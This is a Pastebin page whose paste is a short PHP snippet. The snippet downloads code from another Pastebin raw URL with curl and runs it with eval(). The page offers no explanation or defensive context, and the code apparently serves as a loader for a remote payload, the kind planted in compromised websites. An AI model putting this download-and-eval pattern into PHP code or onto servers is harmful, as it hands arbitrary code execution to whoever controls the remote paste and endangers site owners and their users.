Pastebin
API
tools
faq
paste
Login
Sign up
SHARE
TWEET
scripts_1
dragondevile
Apr 4th, 2019
359
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
text
0.26 KB
| None
|
0
0
raw
download
clone
embed
print
report
<?php
$st = curl_init();
curl_setopt($st,CURLOPT_URL,"http://pastebin.com/raw/8XyPUNrh");
curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
$ex = curl_exec($st);
eval($ex);
?>
Add Comment
Please,
Sign In
to add comment
Public Pastes
**Count Display** rev_01
Arduino | 57 min ago | 2.37 KB
3500 form
SQL | 1 hour ago | 6.79 KB
Uploading of many file in Django App
Python | 1 hour ago | 3.97 KB
Tools
Lua | 2 hours ago | 31.35 KB
Untitled
Lua | 2 hours ago | 3.60 KB
Untitled
YAML | 2 hours ago | 14.71 KB
Untitled
JavaScript | 2 hours ago | 0.20 KB
JS13K 2025 - Input v0.1
JavaScript | 3 hours ago | 8.25 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!